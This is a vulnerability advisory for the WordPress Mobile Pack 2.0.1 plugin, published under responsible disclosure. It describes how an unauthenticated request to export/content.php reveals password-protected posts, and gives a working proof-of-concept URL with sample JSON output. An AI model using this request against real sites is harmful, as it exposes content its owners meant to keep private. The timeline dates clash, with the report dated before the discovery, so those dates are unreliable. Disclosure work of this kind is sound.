Details
================

Software: WordPress Mobile Pack
Version: 2.0.1
Homepage: http://wordpress.org/plugins/wordpress-mobile-pack/
Advisory report: https://security.dxw.com/advisories/information-disclosure-vulnerability-in-wordpress-mobile-pack-allows-anybody-to-read-password-protected-posts/
CVE: Awaiting assignment
CVSS: 5 (Medium; AV:N/AC:L/Au:N/C:P/I:N/A:N)

Description
================

Information disclosure vulnerability in WordPress Mobile Pack allows anybody to read password-protected posts

Vulnerability
================

WordPress Mobile Pack contains a PHP file (export/content.php) which answers unauthenticated requests and allows anybody – authenticated or otherwise – to read all public and password-protected posts, without ever being asked for the post password. Draft and private posts appear not to be affected.

Proof of concept
================

1. Create a password-protected post
2. Enable WordPress Mobile Pack
3. Visit http://localhost/wp-content/plugins/wordpress-mobile-pack/export/content.php?content=exportarticles&callback=x

Your password-protected post is now visible to everybody in the form of JSON wrapped in "x()" (the name given in the callback parameter).

Example output:

x ( { "articles": [ { "id": 849, "title": "Secret post", "timestamp": 1406231170, "author": "admin", "date": "Thu, Jul 24, 2014, 19:46", "link": "http://wp.local/?p=849", "image": "", "description": "HUSH THIS IS A SECRET\n", "content": "", "category_id": 1, "category_name": "Uncategorized" } ] } )

Mitigations
================

Disclosure policy
================

dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/

Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report within 14 days.

Timeline
================

2014-07-24: Discovered
2014-07-13: Reported to developer via email
2014-08-19: Developer reported the issue fixed
2014-08-20: Advisory published

Discovered by dxw
================

Tom Adams

Please visit security.dxw.com for more information.